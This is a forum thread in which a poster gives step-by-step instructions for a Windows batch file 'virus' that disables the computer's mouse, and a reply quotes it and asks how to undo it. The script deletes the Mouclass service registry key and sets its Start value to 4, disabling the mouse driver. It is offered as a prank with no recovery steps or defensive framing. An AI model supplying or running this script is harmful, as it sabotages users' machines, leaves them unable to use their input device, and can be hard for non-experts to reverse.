🔒 Closed Make a virus that disable Mouse

Status
Not open for further replies.

airnel

Elite
I had previously posted on making different batch files like matrix effect, opening no. of websites with one click which were interesting and completely harmless but today we will be making a batch virus which is harmfull it will disable your mouse so think before trying it on yourself.:ROFLMAO:

  • Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  • Save this file as virus.bat
  • Done you just created your virus.:D
 
I had previously posted on making different batch files like matrix effect, opening no. of websites with one click which were interesting and completely harmless but today we will be making a batch virus which is harmfull it will disable your mouse so think before trying it on yourself.:ROFLMAO:
  • Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------​
  • Save this file as virus.bat
  • Done you just created your virus.:D

ehh pano naman ulit paganahin? :D
 
Status
Not open for further replies.

About this Thread

  • 10
    Replies
  • 988
    Views
  • 10
    Participants
Last reply from:
EXECUTOR

Trending Topics

Online now

Members online
357
Guests online
1,233
Total visitors
1,590

Forum statistics

Threads
2,292,329
Posts
29,076,066
Members
1,210,288
Latest member
adamsphloi
Back
Top